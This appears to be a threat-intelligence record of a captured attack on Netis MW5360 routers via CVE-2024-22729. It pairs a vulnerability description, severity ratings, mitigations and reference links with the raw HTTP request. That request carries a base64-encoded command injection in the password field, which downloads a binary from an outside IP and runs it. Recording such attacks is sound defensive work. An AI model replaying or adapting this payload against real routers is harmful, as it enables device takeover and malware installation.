Информация об атаке

Tag
 
CVE-2024-22729
Date
 
2024-06-30
Client IP
 
141.98.83.197
Client GEO
 
panama
Vendor
 
NETIS SYSTEMS
Product
 
MW5360 V1.0.1.3031
RAW request
 
POST /cgi-bin/skk_set.cgi HTTP/1.0
User-Agent: Go-http-client/1.1
Host: █████████████
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
X-Forwarded-For: █████████████
Connection: close

password=YGNkIC90bXA7IHJtIC1yZiBzaGs7IHdnZXQgaHR0cDovLzQ1LjE0OC4xMC43OC9zaGs7IGNobW9kIDc3NyBzaGs7IC4vc2hrIG5ldGlzOyBybSAtcmYgc2hrYA==&quick_set=ap&app=wan_set_shortcut
Description
 
CVE-2024-22729 is a critical command injection vulnerability identified in the NETIS SYSTEMS MW5360 V1.0.1.3031 router. This vulnerability is present on the login page, specifically through the password parameter. The flaw arises from improper handling and lack of sanitization of user input, allowing attackers to inject and execute arbitrary commands on the device.


Exploitation Details


The vulnerability can be exploited remotely without requiring any authentication or user interaction. An attacker can craft a malicious request to the login page, injecting commands via the password parameter. This can lead to full compromise of the device, allowing the attacker to execute arbitrary commands with the same privileges as the web server process.


Impact


The impact of this vulnerability is severe, with a CVSS score of 9.8. Successful exploitation can result in complete control over the affected device, leading to potential data breaches, network compromise, and further attacks on connected systems. The confidentiality, integrity, and availability of the device are all rated as high impact.


Public Exploits and Tools


A public exploit for this vulnerability exists and has been integrated into the Metasploit framework, making it easily accessible for attackers. The exploit module exploit/linux/http/netis_unauth_rce_cve_2024_22729 can be used to leverage this vulnerability.


Conditions for Exploitation


    

  • Attack Vector: Network
    • 

  • Attack Complexity: Low
    • 

  • Privileges Required: None
    • 

  • User Interaction: None
    • 

  • Scope: Unchanged
    • 

  • Confidentiality Impact: High
    • 

  • Integrity Impact: High
    • 

  • Availability Impact: High
    • 



References
Mitigations
 
    

  1. Update Firmware: Check for firmware updates from NETIS SYSTEMS and apply any available patches that address this vulnerability.
    2. 

  2. Network Segmentation: Isolate the affected device from critical network segments to limit potential damage in case of exploitation.
    3. 

  3. Access Controls: Implement strict access controls and limit access to the device's web interface to trusted IP addresses only.
    4. 

  4. Monitor Traffic: Use network monitoring tools to detect and respond to suspicious activities targeting the login page of the device.
    5. 

  5. Disable Unnecessary Services: Disable any unnecessary services on the router to reduce the attack surface.
    6. 

  6. Regular Audits: Conduct regular security audits and vulnerability assessments to identify and mitigate potential risks.
    7.
Links
https://cvefeed.io/vuln/detail/CVE-2024-22729
https://github.com/advisories/GHSA-vqxw-rw4p-r6vh
https://nvd.nist.gov/vuln/detail/CVE-2024-22729
https://packetstormsecurity.com/files/cve/CVE-2024-22729
https://sploitus.com/exploit?id=1337DAY-ID-39662
https://www.cvedetails.com/cve/CVE-2024-22729/
https://www.rapid7.com/blog/post/2024/06/28/metasploit-weekly-wrap-up-06-28-2024/
https://www.recordedfuture.com/vulnerability-database/CVE-2024-22729
https://www.security-database.com/detail.php?alert=CVE-2024-22729
https://www.tenable.com/cve/CVE-2024-22729
https://www.tenable.com/cve/CVE-2024-22729/cpes